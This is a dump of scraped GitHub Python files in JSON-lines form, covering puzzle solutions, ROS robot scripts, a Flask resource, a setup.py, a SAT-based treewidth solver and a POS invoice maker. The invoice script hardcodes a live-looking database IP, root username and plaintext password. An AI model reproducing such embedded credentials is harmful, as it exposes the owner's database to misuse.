s\nif __name__ == \"__main__\":\n code = \"\"\"\nvoid FuncName(int param1,char param2, int *param3, double *parma4){\n printf(\"hello world!\\n\");\n}\n \"\"\"\n filePath =r\"C:\\Users\\User\\Documents\\GitHub\\EveIDE_Plus\\source\\t_workspace\\t_exCpro\\main.c\"\n with open(filePath,'r')as r:\n code0 = r.read()\n code0 = rmCommentsInCFile(code0)\n\n pat1 = re.compile(compileStrA, re.X)\n ret = pat1.findall(code0)\n if ret:\n for ea in ret:\n print(ea[11])\n #print(code)\n '''cl = code.split(\";\")\n\n for e in cl:\n print(e)\n ret = pat1.search(e)\n if None == ret:\n pass\n #print('不包含C函数定义!')\n else:\n #for eachIndex in range(len(ret.group())):\n print(\"定义\"+str(ret))\n #print(ret.group())'''\n\n","repo_name":"Adancurusul/EveIDE_LIGHT","sub_path":"source/t_file.py","file_name":"t_file.py","file_ext":"py","file_size_in_byte":4900,"program_lang":"python","lang":"zh","doc_type":"code","stars":50,"dataset":"github-code","pt":"36"}
+{"seq_id":"7227331574","text":"from collections import defaultdict, deque, namedtuple\nfrom pathlib import Path\nfrom statistics import median\nfrom typing import Iterator\n\nfrom utils import get_neighbors_n_dimensional, read_trimmed\n\n\nclass DictLike:\n def __getitem__(self, item):\n return getattr(self, item)\n\n def __setitem__(self, key, value):\n setattr(self, key, value)\n\n\nclass Point(DictLike):\n def __init__(self, x, y):\n self.x, self.y = x, y\n\n def __hash__(self):\n return hash((self.x, self.y))\n\n def __eq__(self, other):\n return self.x == other.x and self.y == other.y\n\n def __repr__(self) -> str:\n return f\"({self.x}, {self.y})\"\n\n def fold(self, axis, line):\n if self[axis] > line:\n self[axis] = 2 * line - self[axis]\n return self\n\n\ndef q1(dots, folds):\n axis, line = folds[0]\n for dot in dots.copy():\n if axis == \"x\":\n if dot.x > line:\n dots.remove(dot)\n dots.add(Point(2 * line - dot.x, dot.y))\n return len(dots)\n\n\ndef print_dots(dots):\n x_max = max(dot.x for dot in dots)\n y_max = max(dot.y for dot in dots)\n grid = [[\" \" for _ in range(x_max + 1)] for _ in range(y_max + 1)]\n for dot in dots:\n grid[dot.y][dot.x] = \"*\"\n for row in grid:\n print(\"\".join(row))\n\n\ndef q2(dots, folds):\n for axis, line in folds:\n # If edited in place, duplicates aren't removed *shrug*\n dots = {d.fold(axis, line) for d in dots}\n print_dots(dots)\n return len(dots)\n\n\ndef parse_dots(values):\n for v in values:\n dot = v.split(\",\")\n if len(dot) == 2:\n yield Point(int(dot[0]), int(dot[1]))\n\n\ndef parse_folds(values):\n for v in values:\n if len(v.split(\" \")) == 3:\n fold = v.split(\" \")[2]\n yield fold.split(\"=\")[0], int(fold.split(\"=\")[1])\n\n\ndef main():\n filename = \"./13.txt\"\n values = read_trimmed(filename)\n dots = set(parse_dots(values))\n folds = [*parse_folds(values)]\n print(q1(dots, folds))\n\n values = read_trimmed(filename)\n dots = set(parse_dots(values))\n folds = [*parse_folds(values)]\n print(q2(dots, folds))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"blomejd/advent_of_code_2021","sub_path":"advent_2021/13.py","file_name":"13.py","file_ext":"py","file_size_in_byte":2195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"2884716529","text":"# coding:utf-8\n# @Time : 2019-09-11 11:02\n# @Author: Xiawang\n# Description:\nfrom flask_restful import Resource, reqparse\n\nfrom backend.common.extensions import convert_json\nfrom backend.common.new_models import User, TestSheet\nfrom backend.common.response_structure import ResponseStructure\nfrom backend.common.state import Results, ResponseCode\n\n\nclass MyTestSheets(Resource):\n\n def get(self):\n parser = reqparse.RequestParser()\n parser.add_argument('TOKEN', type=str, location='headers')\n args = parser.parse_args()\n user = User.verify_auth_token(args['TOKEN'])\n if not user:\n return Results().get(ResponseCode.FAIL_LOGIN_AUTH)\n results = TestSheet.get_or_none(TestSheet.qa_id == user.id, TestSheet.status=='待部署')\n if results is None:\n return Results().get(ResponseCode.SUCCESS)\n result_data = Results().set_data()\n results = TestSheet.select().where(TestSheet.qa_id == user.id, TestSheet.status == '待部署').order_by(\n TestSheet.create_time.desc())\n\n for result in results:\n testsheet_data = convert_json(TestSheet, result.id)\n ResponseStructure().set_username(data=testsheet_data, id=testsheet_data['qa_id'],\n user='qa_name')\n ResponseStructure().set_username(data=testsheet_data, id=testsheet_data['backend_id'],\n user='backend_name')\n ResponseStructure().set_username(data=testsheet_data, id=testsheet_data['front_id'], user='front_name')\n result_data.append(testsheet_data)\n\n return Results().get(ResponseCode.SUCCESS, data=result_data)\n","repo_name":"Ariaxie-1985/aria","sub_path":"backend/resources/spring/my_testsheets.py","file_name":"my_testsheets.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"34073036518","text":"__author__ = 'Hamilton Kibbe '\n__version__ = '1.0'\n\n\n\n\nMETADATA = {\n 'name': 'pyableton',\n 'version': __version__,\n 'url': 'https://github.com/hamiltonkibbe/PyAbleton',\n 'packages': ['pyableton'],\n 'package_data': {'presets': ['presets/res/*']},\n 'author': 'Hamilton Kibbe',\n 'author_email': 'ham@hamiltonkib.be',\n 'description': 'A library for creating/editing Ableton Live presets',\n 'license': 'MIT License'\n}\n\nSETUPTOOLS_METADATA = {\n 'install_requires':['setuptools','bs4'],\n 'include_package_data': True\n}\n\ndef install():\n \"\"\" Install using setuptools, fallback to distutils\n \"\"\"\n try:\n from setuptools import setup\n METADATA.update(SETUPTOOLS_METADATA)\n setup(**METADATA)\n except ImportError:\n from sys import stderr\n stderr.write('Could not import setuptools, using distutils')\n stderr.write('NOTE: You will need to install dependencies manualy')\n from distutils.core import setup\n setup(**METADATA)\n\nif __name__ == '__main__':\n install()\n\n","repo_name":"hamiltonkibbe/PyAbleton","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"36"}
+{"seq_id":"18962034242","text":"import os\nimport math\nimport string\n\ninput_file = open(\"input.txt\", \"r\")\n\ncounter = 0\n\nfor line in input_file:\n g1, g2 = line.strip().split(\",\")\n g1a, g1b = g1.split(\"-\")\n g2a, g2b = g2.split(\"-\")\n s1 = set(range(int(g1a), int(g1b) + 1))\n s2 = set(range(int(g2a), int(g2b) + 1))\n\n if(s1.issubset(s2) or s2.issubset(s1)):\n counter += 1\n\n\nprint(counter)","repo_name":"rgvillanueva28/advent-of-code-2022","sub_path":"Day 4 - Camp Cleanup/Part 1.py","file_name":"Part 1.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"}
+{"seq_id":"16679927011","text":"from src.modal.Stl import Stl\nfrom src.modal.Hsteel import Hsteel\nfrom src.algorithm.HsteelAnalysis import HsteelAnalysis\n\nfrom matplotlib import pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib import cm\nimport argparse\nimport csv\nimport os\nimport copy\nfrom os import listdir\nfrom os.path import isfile, join\n\nfrom stl import mesh\nimport stl, numpy\nimport time\n\ndef getAllPosAssociation(allPosAttr):\n posAttr = []\n\n for item in allPosAttr:\n for cThick in item[3]:\n for tbThick in item[4]:\n value = [item[0], item[1], item[2], cThick, tbThick]\n posAttr.append(value)\n\n return posAttr\n\ndef main(args):\n stlName = args.name\n stlPath = 'stl/' + stlName\n\n paintOrder = [\n [0, 1, 2],\n [3, 4, 5],\n [6],\n [7],\n ]\n\n # Stl Obj\n stlObj = Stl()\n posHsteelAttr = stlObj.getAllPossibleHsteelAttr(stlPath)\n posHsteelAttr = getAllPosAssociation(posHsteelAttr)\n\n # Hsteel Attr Analysis\n hsteelAnalysis = HsteelAnalysis()\n hsteelConfig = hsteelAnalysis.getMostSimilarConfig(posHsteelAttr)\n for p in hsteelConfig[:5]:\n print(p)\n\n # Hsteel Painting\n fig = plt.figure()\n ax = fig.gca(projection='3d')\n\n hsteelPaint = Hsteel(ax)\n if len(hsteelConfig) > 0:\n print('Similar Result....')\n print(hsteelConfig[0]['config'])\n \n maxLength = 2000\n\n length = hsteelConfig[0]['config']['length']\n paintPoints = []\n # if length < maxLength: maxLength = length\n paintPoint = hsteelPaint.startPaint3dModal(hsteelConfig[0]['config'], length, paintOrder[args.paintMode], args.paintLength)\n lengthTimes = int(length / maxLength)\n for time in range(0, lengthTimes):\n for p in copy.deepcopy(paintPoint):\n if p[1] != -1: p[1] += maxLength * time\n paintPoints.append(p)\n if length % maxLength != 0:\n paintPoint = hsteelPaint.startPaint3dModal(hsteelConfig[0]['config'], length % maxLength, paintOrder[args.paintMode], args.paintLength)\n for p in copy.deepcopy(paintPoint):\n if p[1] != -1: p[1] += length - (length % maxLength)\n paintPoints.append(p)\n\n writeRouteToFile(paintPoints)\n plt.show()\n\ndef checkAllStlConfig():\n stlfiles = [f for f in listdir('stl') if isfile(join('stl', f))]\n \n # Init\n stlObj = Stl()\n hsteelAnalysis = HsteelAnalysis()\n for stlName in stlfiles:\n startTime = time.time()\n print('File ', stlName, ' is checking.....')\n stlPath = 'stl/' + stlName\n\n posHsteelAttr = stlObj.getAllPossibleHsteelAttr(stlPath)\n posHsteelAttr = getAllPosAssociation(posHsteelAttr)\n\n hsteelConfig = hsteelAnalysis.getMostSimilarConfig(posHsteelAttr)\n\n if len(hsteelConfig) > 0:\n similarConfig = hsteelConfig[0]\n record = [\n stlName,\n similarConfig['sameNum'],\n similarConfig['distance'],\n similarConfig['config']['length'],\n similarConfig['config']['height'],\n similarConfig['config']['width'],\n similarConfig['config']['cThick'],\n similarConfig['config']['tbThick'],\n (time.time() - startTime)\n ]\n else:\n record = [stlName, -1, -1, -1, -1, -1, -1, -1, -1]\n writeRecordToFile(record)\n\n print('Finished...')\n\ndef writeRecordToFile(args):\n with open('./src/output/stl_record.csv', 'a', newline='') as csvfile:\n writer = csv.writer(csvfile)\n\n data = [d for d in args]\n writer.writerow(data)\n\ndef writeRouteToFile(route):\n with open('./src/output/route.csv', 'a', newline='') as csvfile:\n csvfile.truncate(0)\n writer = csv.writer(csvfile)\n for i in route:\n if i[1] == -1: continue\n writer.writerow(i)\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--name', '-n', default='H-900x300x14x28x2600.stl', type=str)\n parser.add_argument('--paintMode', '-m', default=4, type=int)\n parser.add_argument('--paintLength', '-l', default=125, type=int)\n parser.add_argument('--runall', '-r', default=False, type=bool)\n\n args = parser.parse_args()\n \n if args.runall: checkAllStlConfig()\n else: main(args)","repo_name":"discreet0303/h-steel-route-plan","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"6260376001","text":"import pytest\nimport logging\nfrom .settings import CLIENT_CONF, DB_CONF\nfrom arango import ArangoClient\n\n\n#\n# Logging\n#\nLOG_LEVELS = {\n 'graphene-arango': logging.DEBUG,\n 'requests': logging.WARN,\n 'urllib3': logging.WARN,\n}\nlogging.basicConfig(level=LOG_LEVELS['graphene-arango'])\nfor litem in LOG_LEVELS.keys():\n logging.getLogger(litem).setLevel(LOG_LEVELS[litem])\n\n\ndef _test_db():\n cli = ArangoClient(**CLIENT_CONF)\n return cli.db(**DB_CONF)\n\n\n@pytest.fixture(scope=\"session\")\ndef test_db():\n # cli = ArangoClient(**CLIENT_CONF)\n yield _test_db()\n\n\n@pytest.fixture(scope=\"session\")\ndef cleanup(test_db):\n yield\n assert test_db.delete_collection('people')\n","repo_name":"riverfr0zen/graphene-arango","sub_path":"graphene_arango/tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"71197249383","text":"#!/usr/bin/env python\n\nimport rospy\nimport sys\nfrom move_base_msgs.msg import *\nfrom geometry_msgs.msg import PoseStamped\n\n\ndef has_reached_goal(data):\n goal_status = data.status.text\n rospy.loginfo(goal_status)\n if goal_status == \"Goal reached.\":\n return True\n else:\n return False\n\n\ndef respond_move_base_result(x, y):\n msg_result = rospy.wait_for_message(\"/robot_0/move_base/result\", MoveBaseActionResult)\n if has_reached_goal(msg_result):\n rospy.loginfo(\"Point x: %f y: %f reached successfully\", x, y)\n sys.exit(0) # success\n else:\n rospy.loginfo(\"Did not reach point x: %f y: %f\", x, y)\n sys.exit(1) # fail\n\n\ndef respond_goal_success(data, expected_x, expected_y):\n x = float(data.pose.position.x)\n y = float(data.pose.position.y)\n rospy.loginfo('Checking goal status X: %f Y: %f', x, y)\n\n if expected_x - 0.1 <= x <= expected_x + 0.1 and expected_y - 0.1 <= y <= expected_y + 0.1:\n respond_move_base_result(x, y)\n else:\n rospy.loginfo(\"Waiting for a next goal\")\n\n\ndef oracle():\n rospy.init_node('oracle', anonymous=True)\n rospy.loginfo(\"Starting oracle ...\")\n rate = rospy.Rate(2)\n\n x, y = list(map(float, sys.argv[1:3]))\n\n while not rospy.is_shutdown():\n rospy.loginfo(\"Waiting for goal ...\")\n pose = rospy.wait_for_message(\"/robot_0/move_base_node/current_goal\", PoseStamped)\n respond_goal_success(pose, x, y)\n rate.sleep()\n\n\nif __name__ == '__main__':\n oracle()\n","repo_name":"ingmarliibert/testit-patrol-learn","sub_path":"testit_patrol_learn/testit_tests/tests/01/oracle/oracle.py","file_name":"oracle.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"32808873641","text":"# !/usr/bin/env python\nfrom __future__ import print_function, division\n\nfrom time import time, sleep\nimport signal\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport rospy\nimport pyexotica as exo\nfrom pyexotica.publish_trajectory import *\n\nimport hsrb_exotica_python_script\n\ndef start_aico():\n do_plot = True\n traj_version = -1\n\n use_screenshot = False\n # ffmpeg -r 50 -f image2 -s 1920x1080 -i ./hsr_driveby_visualisation_%03d.png -vcodec libx264 -pix_fmt yuv420p ./output.mp4\n screenshot = lambda *args: None\n if use_screenshot:\n from jsk_rviz_plugins.srv import Screenshot, ScreenshotRequest, ScreenshotResponse\n rospy.wait_for_service('/rviz/screenshot')\n screenshot = rospy.ServiceProxy('/rviz/screenshot', Screenshot)\n\n exo.Setup.init_ros()\n # config_name = '{hsr_driveby_full}/resources/hsr_meeting_room_table_aico_new.xml'\n config_name = '{hsr_driveby_full}/resources/hsr_meeting_room_table_aico.xml'\n solver = exo.Setup.load_solver(config_name)\n problem = solver.get_problem()\n scene = problem.get_scene()\n kt = scene.get_kinematic_tree()\n joint_limits = problem.get_scene().get_kinematic_tree().get_joint_limits()\n\n # Set target for soda can\n scene.attach_object(\"SodaCan\", \"TargetObject\")\n #scene.attach_object_local(\"TargetObject\", \"Table\", exo.KDLFrame([0.2,0.30,0.06+0.04]))\n #added offset to the y coordinate since planning and simulation grasp objects have different geometry.\n # bottle on right hand side\n # \n scene.attach_object_local(\"TargetObject\", \"Table\", exo.KDLFrame([0.2,0.30,0.06]))#+0.04]))\n # bottle on left hand side\n scene.attach_object_local(\"TargetObject\", \"Table\", exo.KDLFrame([0.2,0.30,0.06]))#+0.04]))\n\n # Move robot to start state\n x_start = problem.start_state\n x_start[0] = 0\n x_start[1] = 0\n x_start[2]= 0\n # x_start[2] = -np.pi/2.\n problem.start_state = x_start\n scene.set_model_state(problem.start_state)\n #scene.set_model_state_map({'hand_motor_joint': 0.7, 'hand_l_spring_proximal_joint':0.9, 'hand_l_distal_joint': -0.6, 'hand_r_spring_proximal_joint':0.9, 'hand_r_distal_joint': -0.6, 'wrist_roll_joint': -1.})\n #set to move to go, assuming robot is already moving\n # \n # scene.set_model_state_map({'hand_motor_joint': 0.7, 'hand_l_spring_proximal_joint':0.9, 'hand_l_distal_joint': -0.6, 'hand_r_spring_proximal_joint':0.9, 'hand_r_distal_joint': -0.6, 'wrist_roll_joint': 0, 'wrist_flex_joint': -np.pi/2, 'arm_roll_joint': -np.pi/2})\n scene.set_model_state_map({'hand_motor_joint': 0.7, 'hand_l_spring_proximal_joint':0.9, 'hand_l_distal_joint': -0.6, 'hand_r_spring_proximal_joint':0.9, 'hand_r_distal_joint': -0.6, 'wrist_roll_joint': 0, 'wrist_flex_joint': -np.pi/2, 'arm_roll_joint': 0})\n problem.start_state = scene.get_model_state()\n q_start = problem.apply_start_state(True)\n q_start = np.clip(q_start, joint_limits[:,0], joint_limits[:,1])\n problem.update(q_start, 0)\n problem.start_state = scene.get_model_state()\n q_start = problem.apply_start_state(True)\n if np.any(q_start < joint_limits[:,0]) or np.any(q_start > joint_limits[:,1]):\n raise RuntimeError(\"Start state exceeds joint limits!\")\n\n mug_location = scene.fk('SodaCan', exo.KDLFrame(), '', exo.KDLFrame()).get_translation_and_rpy()\n\n # t_grasp_begin = 3.5 #4.2\n t_grasp_begin = 4.5\n t_grasp_duration = 0.5\n T_grasp_begin = int(t_grasp_begin / problem.tau)\n T_grasp_end = int((t_grasp_begin + t_grasp_duration) / problem.tau)\n\n # The target position needs to be reached during the grasping period\n problem.set_rho('Position', 0, 0)\n for t in range(T_grasp_begin, T_grasp_end):\n problem.set_rho('Position', 1e4, t)\n problem.set_goal('Position', mug_location[:3], t)\n\n # The HSR has a poor reachability, so we deactivate the base tracking here\n # problem.set_rho('BasePosition', 0, t)\n\n # Height above the table before and after grasp\n problem.set_rho('LiftOffTable', 1e2, T_grasp_begin - 20)\n # problem.set_rho('LiftOffTable', 1e3, T_grasp_end + 5)\n # problem.set_rho('LiftOffTable', 1e4, T_grasp_end + 10)\n problem.set_rho('LiftOffTable', 1e2, T_grasp_end + 20)\n\n\n # The axis needs to be fixed from the beginning of the grasp to the end of the motion\n for t in range(T_grasp_begin, problem.T):\n #problem.set_rho('AxisAlignment', 1e4, t)\n problem.set_rho('AxisAlignment', 1e2, t)\n\n problem.set_rho('BaseOrientation', 1e2, -1)\n\n # Initial trajectory = zero motion\n zero_motion = np.zeros((problem.T,problem.N))\n for t in range(problem.T):\n zero_motion[t,:] = q_start\n problem.initial_trajectory = zero_motion\n\n solution = solver.solve()\n print(\"Solved in\", solver.get_planning_time(), \"final cost\", problem.get_cost_evolution()[1][-1])\n # '''\n # Show convergence plot\n fig = plt.figure(1)\n plt.plot(problem.get_cost_evolution()[0], problem.get_cost_evolution()[1])\n plt.yscale('log')\n plt.ylabel('Cost')\n plt.xlabel('Time (s)')\n plt.xlim(0,np.max(problem.get_cost_evolution()[0]))\n plt.title('Convergence')\n\n # Show cost breakdown\n fig = plt.figure(2)\n # '''\n if do_plot:\n costs = {}\n ct = 1.0 / problem.tau / problem.T\n for t in range(problem.T):\n problem.update(solution[t,:],t)\n for cost_task in problem.cost.indexing:\n task = problem.cost.tasks[cost_task.id]\n task_name = task.name\n task_id = task.id\n costs[task_name] = np.zeros((problem.T,))\n # print(task_id, task_name, task, cost_task.start, cost_task.length, cost_task.startJ, cost_task.lengthJ)\n for t in range(problem.T):\n ydiff = problem.cost.ydiff[t][cost_task.startJ:cost_task.startJ+cost_task.lengthJ]\n rho = problem.cost.S[t][cost_task.startJ:cost_task.startJ+cost_task.lengthJ,cost_task.startJ:cost_task.startJ+cost_task.lengthJ]\n cost = np.dot(np.dot(ydiff, rho), ydiff)\n costs[task_name][t] = ct * cost\n # '''\n if do_plot:\n costs['Task'] = np.zeros((problem.T,))\n costs['Transition'] = np.zeros((problem.T,))\n for t in range(problem.T):\n costs['Task'][t] = problem.get_scalar_task_cost(t)\n costs['Transition'][t] = problem.get_scalar_transition_cost(t)\n for cost in costs:\n plt.plot(costs[cost], label=cost)\n plt.legend()\n plt.xlim(0,problem.T)\n plt.title('Cost breakdown across trajectory per task')\n plt.show()\n plot(solution, labels=scene.get_controlled_joint_names())\n print(mug_location)\n return solution\n publish_trajectory(solution, problem.T*problem.tau, problem)\n# '''\n#midpoint = int(problem.T / 2)\n# midpoint = int((t_grasp_begin + t_grasp_duration)/problem.tau)\n# Add a custom publish_trajectory to support attaching the Coke can...\ndef publish_trajectory(traj, T, problem, once=False):\n if len(traj) == 0:\n print(\"Trajectory has zero elements\")\n raise\n signal.signal(signal.SIGINT, sig_int_handler)\n print('Playing back trajectory ' + str(T) + 's')\n dt = float(T) / float(len(traj))\n t = 0\n grasp_times = [t_grasp_begin, t_grasp_duration]\n return(solution)\n # print(\"saving trajectory\")\n # np.save('example_trajectory_t'+str(traj_version),solution)\n # hsrb_exotica_python_script.send_trajectory(solution, grasp_times, dt)\n # while True:\n # try:\n # publish_pose(traj[t], problem, float(t) * dt)\n # sleep(dt)\n\n # # Create screenshot if desired\n # if use_screenshot:\n # screenshot('/tmp/hsr_driveby_visualisation_{:03d}.png'.format(t))\n # sleep(0.1)\n # if t == len(traj) - 1:\n # print(\"Screenshots created, exiting.\")\n # break\n\n # if t >= len(traj) - 1 and once:\n # return\n # t = (t + 1) % len(traj)\n # if t == midpoint:\n # scene.attach_object(\"SodaCan\", \"hand_palm_link\")\n # elif t == 0:\n # scene.attach_object_local(\"SodaCan\", \"\", mug_location)\n # except KeyboardInterrupt:\n # return False\n#print(np.r_[mug_location[:3],3,4,5])\n#print(problem)\n#print(type(problem))\n#print(problem.start_state)\n","repo_name":"rshi159/hsr_driveby_full","sub_path":"scripts/rob_stuff/hsr_meeting_table_aico_whole.py","file_name":"hsr_meeting_table_aico_whole.py","file_ext":"py","file_size_in_byte":8435,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"36"}
+{"seq_id":"13240955694","text":"# pos project\n# Invoice maker\n\nimport pymysql\nimport time, datetime\n\nconn = pymysql.connect(host='45.119.147.76', user='root', password='201400867', db='hufPOS', charset='utf8')\ncurs = conn.cursor()\n\nclass Payinfo:\n def getdata(self):\n curs.execute(\"\"\"SELECT * FROM t_payinfo \"\"\")\n conn.commit()\n all_table = curs.fetchall()\n return all_table\n\n def search_obj(self, Pnumb):\n try:\n curs.execute(\"\"\"SELECT * FROM t_payinfo WHERE Pnumb = %s\"\"\", Pnumb)\n conn.commit()\n src_result = curs.fetchall()\n print(src_result)\n return src_result\n except :\n print('there is wrong data, try again')\n\n def get_pmenu(self, Pnumb):\n try:\n curs.execute(\"\"\"SELECT Pmenu FROM t_payinfo WHERE Pnumb = %s\"\"\", Pnumb)\n conn.commit()\n src_result = curs.fetchall()\n print(src_result)\n return src_result\n except :\n print('there is wrong data, try again')\n\n def get_mns(self, MNcode):\n try:\n curs.execute(\"\"\"SELECT MNname, MNprice FROM t_product WHERE MNcode = %s\"\"\", MNcode)\n conn.commit()\n src_result = curs.fetchall()\n print(src_result)\n return src_result\n except :\n print('there is wrong data, try again')\n\ninvo_notdone = True\n\nwhile invo_notdone:\n this_member = Payinfo()\n show_table = this_member.getdata()\n print(show_table)\n print('영수증을 검색하시겠습니까? Y or N')\n\n command = input('type user command: ')\n\n if command == 'y' or command == 'Y': # 2) find payinfo\n Pnumb = input('검색하고자 하는 주문번호를 입력하세요:')\n search_result = str(this_member.search_obj(Pnumb))\n search_result = search_result.strip('(,)')\n\n Pnumb = search_result.split(',')[0]\n\n ptime_slice = search_result.split('(')[1]\n ptime_list = ptime_slice.split('),')[0]\n ptime_list = ''.join(ptime_list)\n ptime_list_year = ''.join(ptime_list.split(',')[0])\n ptime_list_mon = ''.join(ptime_list.split(',')[1])\n ptime_list_day = ''.join(ptime_list.split(',')[2])\n ptime_list_hr = ''.join(ptime_list.split(',')[3])\n ptime_list_mn = ''.join(ptime_list.split(',')[4])\n Ptime = ptime_list_year+ ptime_list_mon + ptime_list_day + ptime_list_hr + ptime_list_mn\n\n pclass = ptime_slice.split('),')[1]\n pclass_list = pclass.strip(''' ',',\"' ''')\n if pclass_list.count('카드'):\n Pclass_card = pclass_list.split(',')[0]\n P_card = int(Pclass_card.split(':')[1])\n else:\n P_card = 0\n if pclass_list.count('현금'):\n if P_card != 0:\n Pclass_cash = pclass_list.split(',')[1]\n else:\n Pclass_cash = pclass_list.split(',')[0]\n P_cash = int(Pclass_cash.split(':')[1])\n else:\n P_cash = 0\n pay_total = P_card + P_cash\n tax = int(pay_total*0.1)\n ohne_zoll = pay_total - tax\n\n pmenu_ls = str(this_member.get_pmenu(Pnumb))\n pmenu_ls = pmenu_ls.strip('((\"\",),)')\n print(pmenu_ls)\n '''mns = pmenu_ls.split(',')\n for idx, val in enumerate(mns):\n if idx % 2 == 1:\n qt = []\n qt.append(val)\n else:\n mn = []\n val = val.strip(\"''\")\n mn.append(val)\n print(qt, mn)'''\n\n #get_mns()\n #pmenu_qt = pmenu_mn.split(',')[1]\n #print(pmenu_qt)\n '''상품명과 단가는 t_product에서 가져오고 수량은 payinfo에서 금액은 단가*수량\n 상품명 찾기:\n pmenu 리스트 각 요소의 앞쪽 두글자 앞에 M 을 붙여서 t_product 테이블에 검색 쿼리를 보내고\n 받아온 정보를 이름, 단가로 변수별로 나눠서 저장한다.\n 리스트 각 요소 , 뒤 숫자가 수량으로 저장되면 된다.\n 금액은 단가 * 수량\n 리스트로 만들어서 상품명 단가 수량 금액 \\n \n 문자열로 만들려면 마지막에 ''.join()'''\n\n print(\"\"\"\" \n 영\t \t 수\t\t 증\n \t동네카페 외대 본점\n인터넷:www.dongne-cafe.onilne\n주소: 서울시 동대문구 이문로 107\n사업자: 201-81-20323 대표: dmkim\nTEL: 02-2173-2216\tFAX: 02-2173-0114\n주문시간:\"\"\", Ptime, \"\"\"\n포스No:1\t담당자:카페4조\t 주문번호: \"\"\", Pnumb, \"\"\"\n--------------------------------------------\n상품명\t\t 단가 수량 금액\n--------------------------------------------\n\"\"\", pmenu_ls, \"\"\"\n\n--------------------------------------------\n카드계\t\t\t\t\t\t \"\"\", P_card, \"\"\"\n현금계\t\t\t\t\t \"\"\", P_cash, \"\"\"\n총판매계\t\t\t \"\"\", pay_total, \"\"\" \n--------------------------------------------\n과세상품금액\t\t\t\t \"\"\", ohne_zoll, \"\"\" \n부가가치세\t\t\t\t \"\"\", tax, \"\"\" \n--------------------------------------------\n\tVielen Dank! Wiedersehen!\n\t\n\"\"\")\n\n else:\n print('영수증 검색을 취소했습니다.')\n Invo_notdone = True","repo_name":"Tieo/hufPOS_module","sub_path":"InvoiceMaker.py","file_name":"InvoiceMaker.py","file_ext":"py","file_size_in_byte":5208,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"}
+{"seq_id":"23897603203","text":"import subprocess\n\nimport ctw.c_lower_bound as clb\nimport ctw.c_upper_bound as cb\nimport tw_utils\nimport sys\nfrom ctw import c_sv as svc\nimport sys\nfrom pysat.solvers import Glucose3\n\n\ndef solve_c(g, c_vertices, tub, c_value):\n c_lb = clb.c_lower_bound(g, c_vertices)\n print(f\"C lower bound {c_lb}\")\n val = c_value - 1\n ordering = None\n\n while c_lb <= val < c_value:\n print(f\"\\nLooking for decomposition of width C: {val}\")\n\n enc = svc.CTwEncoding(c_vertices, val, g)\n enc.encode()\n enc.encode_card(tub)\n\n with Glucose3() as slv:\n slv.append_formula(enc.formula)\n result = slv.solve()\n if result:\n model = {abs(x): x > 0 for x in slv.get_model()}\n ordering = []\n\n for i in range(0, len(g.nodes)):\n pos = 0\n for j in ordering:\n if not model[enc._ord(j, i)]:\n break\n pos += 1\n\n ordering.insert(pos, i)\n\n # Translate encoder indexing\n ordering = [enc.nodes[x] for x in ordering]\n\n b, t, r = tw_utils.ordering_to_decomp(g, ordering)\n # Check actual size of decomposition and proceed accordingly\n tub = max(len(cb) - 1 for cb in b.values())\n knownc = max(len(cb & c_vertices) for cb in b.values())\n val = knownc - 1\n print(f\"Found decomposition of size {tub}, C: {knownc}\")\n sys.stdout.flush()\n else:\n print(\"Failed to find decomposition\")\n sys.stdout.flush()\n val += 1\n\n print(f\"\\nFound tree width {tub}, C: {knownc}\")\n sys.stdout.flush()\n return tub, ordering\n\n return val, tub, ordering\n\n\ndef solve(g, c_vertices, tub=None):\n if len(c_vertices) == 0:\n return -1, None\n print(f\"Graph has {len(g.nodes)} nodes, {len(g.edges)} edges and {len(c_vertices)} c-vertices\")\n\n tub2, c_val, ordering = cb.min_c(g, c_vertices)\n if tub is None or tub2 < tub:\n tub = tub2\n\n tub2, val, ordering2 = solve_c(g, c_vertices, tub, c_val)\n if ordering2 is not None:\n c_val = val\n tub = tub2\n ordering = ordering2\n\n print(f\"Upper bound C: {c_val}, tree width {tub}\")\n sys.stdout.flush()\n\n # For c-treewidth we have to find the optimal c-value\n tlb = 1\n cval = tub-1\n knownc = c_val\n\n while tlb <= cval < tub:\n print(f\"\\nLooking for decomposition of size {cval}, C: {c_val}\")\n enc = svc.CTwEncoding(c_vertices, c_val, g)\n enc.encode()\n enc.encode_card(cval)\n\n with Glucose3() as slv:\n slv.append_formula(enc.formula)\n result = slv.solve()\n if result:\n model = {abs(x): x > 0 for x in slv.get_model()}\n ordering = []\n\n for i in range(0, len(g.nodes)):\n pos = 0\n for j in ordering:\n if not model[enc._ord(j, i)]:\n break\n pos += 1\n\n ordering.insert(pos, i)\n\n # Translate encoder indexing\n ordering = [enc.nodes[x] for x in ordering]\n\n b, t, r = tw_utils.ordering_to_decomp(g, ordering)\n # Check actual size of decomposition and proceed accordingly\n tub = max(len(cb) - 1 for cb in b.values())\n knownc = max(len(cb & c_vertices) for cb in b.values())\n cval = tub - 1\n print(f\"Found decomposition of size {tub}, C: {knownc}\")\n sys.stdout.flush()\n else:\n print(\"Failed to find decomposition\")\n sys.stdout.flush()\n cval += 1\n tlb = cval\n\n print(f\"\\nFound tree width {tub}, C: {knownc}\")\n 